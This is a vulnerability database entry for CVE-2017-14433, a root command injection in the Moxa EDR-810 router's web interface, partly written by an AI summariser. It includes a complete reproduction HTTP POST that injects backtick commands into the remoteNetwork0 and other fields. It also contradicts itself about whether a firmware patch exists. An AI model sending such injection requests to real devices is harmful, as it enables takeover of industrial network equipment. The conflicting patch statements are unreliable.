CVE-2017-14433
Description
An exploitable command injection vulnerability exists in the web server functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted HTTP POST can cause a privilege escalation resulting in root shell. An attacker can inject OS commands into the remoteNetwork0= parameter in the "/goform/net\_Web\_get_value" uri to trigger this vulnerability.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Command injection in Moxa EDR-810 web interface allows authenticated attackers to execute arbitrary OS commands as root.
Vulnerability
The Moxa EDR-810 industrial VPN router running firmware version V4.1 build 17030317 contains an OS command injection vulnerability in the web server. The remoteNetwork0= parameter in the /goform/net_Web_get_value endpoint is not properly sanitized before being used in a system command. An authenticated user can inject arbitrary OS commands via a specially crafted HTTP POST request [1].
Exploitation
An attacker must first authenticate to the device's web interface. Once logged in, a POST request to /goform/net_Web_get_value with the remoteNetwork0 parameter containing command injection payloads (e.g., using backticks or semicolons) will be executed. The web server runs with root privileges, so injected commands run as root [1].
Impact
Successful exploitation allows an attacker to execute arbitrary OS commands with root privileges, leading to full compromise of the device. This includes the ability to read, modify, or delete sensitive data, install malware, pivot to internal networks, and disrupt operations [1].
Mitigation
Moxa has not released a firmware patch for this vulnerability as of the advisory date (2017). Users should restrict network access to the web interface to trusted IPs only, disable the web interface if not required, and monitor for unauthorized access. The device is not listed in CISA's Known Exploited Vulnerabilities catalog [1].
AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
2- Talos/Moxav5Range: Moxa EDR-810 V4.1 build 17030317
Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"Improper neutralization of special elements in the `remoteNetwork0=` parameter allows OS command injection."
Attack vector
An attacker must first authenticate to the device's web interface. Once logged in, they send a crafted HTTP POST to `/goform/net_Web_get_value` with the `remoteNetwork0=` parameter containing injected OS commands wrapped in backticks (e.g., `` `sleep+10` ``). The web server, running as root, executes the injected commands with root privileges, resulting in privilege escalation to a root shell [ref_id=1].
Affected code
The vulnerable endpoint is `/goform/net_Web_get_value` with the parameter `remoteNetwork0=`. The web server processes this parameter without sanitization before passing it to an OS command, and the server runs as root [ref_id=1].
What the fix does
The advisory states the vendor patched and published new firmware on 2018-04-12, but no patch diff is included in the bundle. The remediation guidance is to update to the patched firmware version, which presumably adds proper input sanitization or escaping for the `remoteNetwork0=` parameter before it is used in OS command execution [ref_id=1].
Preconditions
- authAttacker must have valid credentials to log in to the device's web interface
- networkAttacker must be able to reach the device's web server over the network
- inputAttacker sends a crafted HTTP POST with command injection payload in the remoteNetwork0 parameter
Reproduction
Send the following HTTP POST request to the target device (replace the Host IP as needed):
``` POST /goform/net_Web_get_value?SRV=SRV_OPENVPN_SERVER_USER HTTP/1.1 Host: 192.168.127.254 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Referer: http://192.168.127.254/openvpn_user.asp Cookie: NAME=admin; PASSWORD=1cf17e0c60ed7ecb0977fdfc0e218c65; AUTHORITY=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 199
openvpnServer0_tmp=AAAA%2Bvvvvv%2B%60sleep%2B10%60%2B%60sleep%2B10%60%2B&ovpnServerId=1&username0=AAAA&password0=vvvvv&password_c=vvvvv&remoteNetwork0=%60sleep%2B10%60&remoteNetmask0=%60sleep%2B10%60 ```
The backtick-enclosed commands in `remoteNetwork0=` (e.g., `` `sleep+10` ``) will be executed by the server with root privileges [ref_id=1].
Generated on May 25, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
1- www.talosintelligence.com/vulnerability_reports/TALOS-2017-0482mitrex_refsource_MISC
News mentions
0No linked articles in our index yet.